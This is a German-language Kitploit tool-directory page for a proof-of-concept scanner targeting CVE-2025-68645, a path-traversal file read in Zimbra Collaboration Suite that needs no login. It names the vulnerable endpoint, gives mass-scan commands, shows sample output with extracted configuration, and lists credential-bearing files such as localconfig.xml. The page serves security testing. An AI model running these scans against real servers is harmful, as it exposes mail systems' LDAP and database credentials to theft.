Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Poc_CVE-2025-68645 — Zimbra Path Traversal (CVE-2025-68645) - Nicht authentifizierte Datei-Lese-Schwachstelle in Zimbra Collaboration Suite | Kitploit
Tools/GitHubGitHub/harisaidhin/poc_cve-2025-68645
AufklärungSchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungPenetrationstests
GitHubharisaidhin/poc_cve-2025-68645

Poc_CVE-2025-68645

Zimbra Path Traversal (CVE-2025-68645) - Nicht authentifizierte Datei-Lese-Schwachstelle in Zimbra Collaboration Suite

Repository anzeigen
11vor 4 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-68645 - Zimbra Path-Traversal-Schwachstelle

Security CVE Python License Status

📋 Übersicht

CVE-2025-68645 ist eine Path-Traversal-Schwachstelle in Zimbra Collaboration Suite, die nicht authentifizierten Angreifern das Lesen beliebiger Dateien vom Dateisystem des Servers ermöglicht.

Verwundbarer Endpunkt

/h/printconversations?javax.servlet.include.servlet_path=

🎯 Auswirkungen

AuswirkungSchweregrad
Nicht authentifiziertes Dateilesen🔴 Hoch
Offenlegung von Konfigurationsdaten🔴 Hoch
Offenlegung von Zugangsdaten🔴 Hoch
Kartierung des internen Netzwerks🟠 Mittel

📁 Lesbare Dateien

🚀 Verwendung

Scan eines einzelnen Ziels

python CVE-2025-68645.py.py -t https://target.zimbra.com

Massen-Scan

python CVE-2025-68645.py.py -l targets.txt -o results.json --threads 20

Erweiterte Optionen

python CVE-2025-68645.py.py -t https://target.zimbra.com -v --timeout 30

📊 Befehlszeilenargumente

Argument Beschreibung Standard -t, --target URL eines einzelnen Ziels None -l, --list Datei mit einer Liste von Zielen None -o, --output Name der Ausgabedatei results.json --threads Anzahl gleichzeitiger Threads 10 --timeout Timeout der Anfrage in Sekunden 15 -v, --verbose Ausführliche Ausgabe aktivieren False --no-verify SSL-Überprüfung deaktivieren False --read-all Alle sensiblen Pfade lesen False

📸 Beispielausgabe

[*] Scanning: https://target.zimbra.local [✓] VULNERABLE: https://target.zimbra.local [+] Extracted configuration: version: 220726130125 memcached: target.local:11211 httpsPort: 8443 httpPort: 8080 [+] Found: /WEB-INF/web.xml [+] Found: /opt/zimbra/conf/localconfig.xml [!] Possible credentials leaked in /WEB-INF/web.xml

============================================================ SCAN COMPLETE! Time elapsed: 1.02 seconds Total targets: 1 Vulnerable: 1 Not vulnerable: 0

Tool herunterladen
PfadOffengelegte Informationen
/WEB-INF/web.xmlServlet-Mappings, Sicherheitsbeschränkungen
/WEB-INF/zcs.web.xmlZimbra-spezifische Konfiguration
/opt/zimbra/conf/localconfig.xmlLDAP-Zugangsdaten, Datenbank-Passwörter
/opt/zimbra/conf/ldap-config.xmlLDAP-Serverkonfiguration
/opt/zimbra/conf/attrs/zimbra-attrs.xmlSystemattribute
/WEB-INF/classes/logging.propertiesLogging-Konfiguration